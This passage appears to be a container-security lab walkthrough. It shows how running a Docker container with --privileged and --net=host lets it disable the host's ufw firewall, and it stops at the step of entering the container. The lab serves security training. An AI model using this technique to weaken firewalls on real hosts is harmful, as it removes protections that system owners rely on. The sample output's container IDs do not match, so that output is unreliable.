You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
By setting --privileged and --net=host flag when running a container, network-stack of the host machine can be tampered with.
In this Attack, Uncomplicated Firewall(ufw) of the host-machine is disabled from a container.
Step 1:
Open Terminal
Step 2:
Check if ufw is enabled on the host machine by running ufw status
root@we45:~# ufw status
Status: inactive
Step 3:
Enable ufw by running ufw enable
root@we45:~# ufw enable
Firewall is active and enabled on system startup
Step 4:
Run docker run -d --privileged --net=host --name vul_flask abhaybhargav/vul_flask to start a docker container.
root@we45:~# docker run -d --privileged --net=host --name vul_flask abhaybhargav/vul_flask
6733abdce5042a90db8b7d40a08155470c727e8b3864eda519714e172f63be88
Step 5:
Run docker ps to view, all running containers.
root@we45:~# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
d0169e5801fe abhaybhargav/vul_flask "python app.py" 24 seconds ago Up 22 seconds 5050/tcp vul_flask
Step 6:
Run docker exec -it vul_flask bash to exec into a running container.